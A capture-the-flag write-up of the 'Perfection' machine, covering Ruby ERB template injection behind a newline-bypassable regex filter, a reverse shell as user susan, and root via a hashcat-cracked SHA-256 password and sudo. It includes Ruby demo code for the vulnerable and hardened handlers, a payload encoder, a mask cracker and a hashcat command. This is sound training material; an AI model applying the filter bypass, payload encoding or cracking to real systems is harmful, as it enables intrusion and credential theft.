
Week 9. Perfection
TL;DR
This is an Ubuntu 22.04 machine running a web site vulnerable to SSTI, which is exploited to get a shell on the system. For escalation, there is a password hash in the file system that, once cracked, yields the password of a sudoer user.
KEYWORDS
Ruby, WEBrick 1.7.0, SSTI, Hashcat mask attack, sudo escalation.
REFERENCES
https://github.com/ruby/webrick
https://www.honeybadger.io/blog/ruby-template-performance-erb-haml-slim/
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby
ENUMERATION
Port scan.
> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-02 15:20 EST
Nmap scan report for 10.10.11.253
Host is up, received user-set (0.088s latency).
Not shown: 62834 closed tcp ports (conn-refused), 2699 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up) scanned in 16.00 seconds
Enumerate the open ports.
Enumerate the web site with Firefox. It is a web tool to calculate weighted grades.
Submit some input to see how the site works; bear in mind the weights must add up to 100. Capture the request with Burp Suite and inspect the response.
The Server response header reports WEBrick 1.7.0 running on Ruby 3.0.2. WEBrick is the HTTP server bundled with Ruby, so the application itself is written in Ruby, which narrows down the template engines worth testing.
This is everything we need to know to begin exploitation.
USER
Investigating about WEBrick and Ruby I found these web sites:
https://github.com/ruby/webrick
https://www.honeybadger.io/blog/ruby-template-performance-erb-haml-slim
According to them, there are three common Ruby template engines: ERB, HAML and Slim, of which ERB is the most common because it ships with Ruby's standard library. Looking for Ruby ERB SSTI payloads I found this reference:
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#erb-ruby
Let's start with the simplest payload, <%= 7*7 %>. Entering it in the "Category" column field returns "Malicious input blocked", so an input filter is in place.
Testing the application, we find that it rejects non-alphanumeric characters, and it turns out the filter can be bypassed by prefixing the payload with %0A (a URL-encoded newline): a harmless alphanumeric category name, then the newline, then the ERB tag. This is consistent with a validation regex anchored with ^ and $: in Ruby those anchors match at line boundaries, not string boundaries (\A and \z are the string anchors), so only the first line of the value is checked. The server-side code is not shown here, so treat this as the likely cause rather than a confirmed one.
This time the application outputs the value "49", so the SSTI vulnerability is confirmed. Start a listener and refer to HackTricks or PayloadsAllTheThings to prepare a reverse shell payload. Remember to URL-encode it before sending.
For example, this payload was confirmed to be working.
A reverse shell as user susan is received on port 1919, which can be used to retrieve the user flag.
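To make the filter bypass concrete, here is an added Ruby example that is not the box's code: a handler modelled on the behaviour described above, which validates the category with a ^/$-anchored regex (an assumption about the real filter) and then interpolates it into an ERB template, next to a hardened version that uses \A/\z and never puts user input into template source. It also builds the URL-encoded form value the client has to send. All function, constant and template names are hypothetical.

```ruby
require 'erb'
require 'uri'

# Weak check, as the filter is assumed to behave: in Ruby, ^ and $ match at
# LINE boundaries, so only the first line of a multi-line value is validated.
WEAK_CATEGORY_RE   = /^[a-zA-Z0-9]+$/
# Correct check: \A and \z anchor to the start and end of the whole string.
STRICT_CATEGORY_RE = /\A[a-zA-Z0-9]+\z/

def weak_filter_ok?(value)
  value.match?(WEAK_CATEGORY_RE)
end

def strict_filter_ok?(value)
  value.match?(STRICT_CATEGORY_RE)
end

# Hypothetical vulnerable handler: the submitted category is interpolated
# into the ERB source itself, so ERB tags inside it are evaluated server-side.
def render_category(category)
  template = "<p>Category: #{category}</p>"
  ERB.new(template).result(binding)
end

# What the vulnerable application answers for a raw (already URL-decoded) value.
def probe(category)
  return 'Malicious input blocked' unless weak_filter_ok?(category)

  render_category(category)
end

# Hardened handler: strict anchors, and the value is only ever treated as data
# (escaped and concatenated into the output, never compiled as a template).
def probe_hardened(category)
  return 'Malicious input blocked' unless strict_filter_ok?(category)

  "<p>Category: #{ERB::Util.html_escape(category)}</p>"
end

# The form value the client has to send: a harmless first line, a newline,
# then the ERB expression, URL-encoded (the newline becomes %0A).
def build_form_value(erb_expression, prefix: 'a')
  URI.encode_www_form_component("#{prefix}\n#{erb_expression}")
end

if __FILE__ == $PROGRAM_NAME
  puts probe('<%= 7*7 %>')              # blocked: no newline, '<' fails the regex
  puts probe("a\n<%= 7*7 %>")           # passes the weak check and renders 49
  puts build_form_value('<%= 7*7 %>')   # what goes into the POST body
  puts probe_hardened("a\n<%= 7*7 %>")  # blocked by the \A/\z check
end
```

Swap `<%= 7*7 %>` for the reverse-shell ERB expression from the references above and `build_form_value` produces the encoded value to paste into the Burp request; the hardened handler shows that both fixes matter, since strict anchors alone still leave the template interpolation in place.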
ROOT
Start from the low-privilege reverse shell as user susan. Bearing in mind this is an "easy" box, linpeas.sh will very likely find the flaw automatically.
Run it and inspect the results.
Some interesting facts are revealed. First, cron jobs and Ruby scripts are found in Susan's home.
Next, it seems Susan is a sudoer.
Also, a cloud credentials file is found in her home directory.
And finally, the tool reveals Susan has received emails.
We could exploit the fact that susan is a sudoer, but for that we need her cleartext password. Let's look for it in the credentials file.
There is a hash for Susan Miller that looks like SHA-256 (a 64-character hex string; hashcat mode 1400).
The next step is to enumerate Susan's email.
It reveals the pattern used to create her password. Since we also have the hash, we are in a position to launch a Hashcat mask attack: the fixed parts of the pattern become literal characters in the mask and only the unknown positions are brute-forced, which shrinks the keyspace from "every possible string" to something a single machine can exhaust.
This returns Susan's password, which we can use to connect to the host via SSH.
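As an added illustration of what the mask attack does (this is example code, not the box's files nor hashcat itself): a small Ruby implementation of hashcat's mask syntax that expands ?l ?u ?d ?s and literal characters, computes the keyspace, and hashes candidates with SHA-256 until one matches. The sample hash and the mask `susan?d?d?d?d` are constructed for the demo and are not the hash or the password pattern from the box; the real mask comes from the pattern in Susan's email.

```ruby
require 'digest'

# Hashcat built-in charsets, with the same membership as ?l ?u ?d ?s.
CHARSETS = {
  'l' => ('a'..'z').to_a,
  'u' => ('A'..'Z').to_a,
  'd' => ('0'..'9').to_a,
  # ?s is space plus the 32 ASCII punctuation characters (33 symbols).
  's' => (' '..'/').to_a + (':'..'@').to_a + ('['..'`').to_a + ('{'..'~').to_a,
}.freeze

# Turn a hashcat-style mask into one candidate list per position.
# Plain characters are literals (a one-element list), "?x" expands to a
# charset, and "??" is a literal question mark.
def parse_mask(mask)
  positions = []
  i = 0
  while i < mask.length
    if mask[i] == '?' && i + 1 < mask.length
      key = mask[i + 1]
      set = key == '?' ? ['?'] : CHARSETS[key]
      raise ArgumentError, "unknown charset ?#{key}" if set.nil?

      positions << set
      i += 2
    else
      positions << [mask[i]]
      i += 1
    end
  end
  positions
end

# Number of candidates the mask generates: the product of the per-position sizes.
def keyspace(mask)
  parse_mask(mask).map(&:length).reduce(1, :*)
end

# Enumerate candidates without materialising them all: candidate number n is
# decoded mixed-radix, last position varying fastest (like an odometer).
def each_candidate(mask)
  return enum_for(__method__, mask) unless block_given?

  positions = parse_mask(mask)
  keyspace(mask).times do |n|
    chars = []
    positions.reverse_each do |set|
      n, r = n.divmod(set.length)
      chars.unshift(set[r])
    end
    yield chars.join
  end
end

# Hash every candidate with SHA-256 (hashcat mode 1400) until one matches.
def crack_sha256(target_hex, mask)
  target = target_hex.downcase
  each_candidate(mask) do |candidate|
    return candidate if Digest::SHA256.hexdigest(candidate) == target
  end
  nil
end

# Constructed sample: the hash of a made-up password following a made-up
# "name plus four digits" pattern. It is NOT the hash or pattern from the box.
SAMPLE_HASH = Digest::SHA256.hexdigest('susan4711')
SAMPLE_MASK = 'susan?d?d?d?d'

if __FILE__ == $PROGRAM_NAME
  puts "keyspace for #{SAMPLE_MASK}: #{keyspace(SAMPLE_MASK)}"
  puts "recovered: #{crack_sha256(SAMPLE_HASH, SAMPLE_MASK).inspect}"
end
```

The equivalent real-world run is `hashcat -m 1400 -a 3 hash.txt '<mask>'`, where -m 1400 selects SHA2-256 and -a 3 selects the brute-force (mask) attack mode; use -1/-2 custom charsets when a position is limited to a subset of characters, since every extra symbol at every unknown position multiplies the keyspace.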
From the SSH shell, take the opportunity to enumerate the system.
Now that we have Susan's password we can enumerate her sudo configuration with sudo -l.
Nice, just proceed to spawn a root shell.
You are root.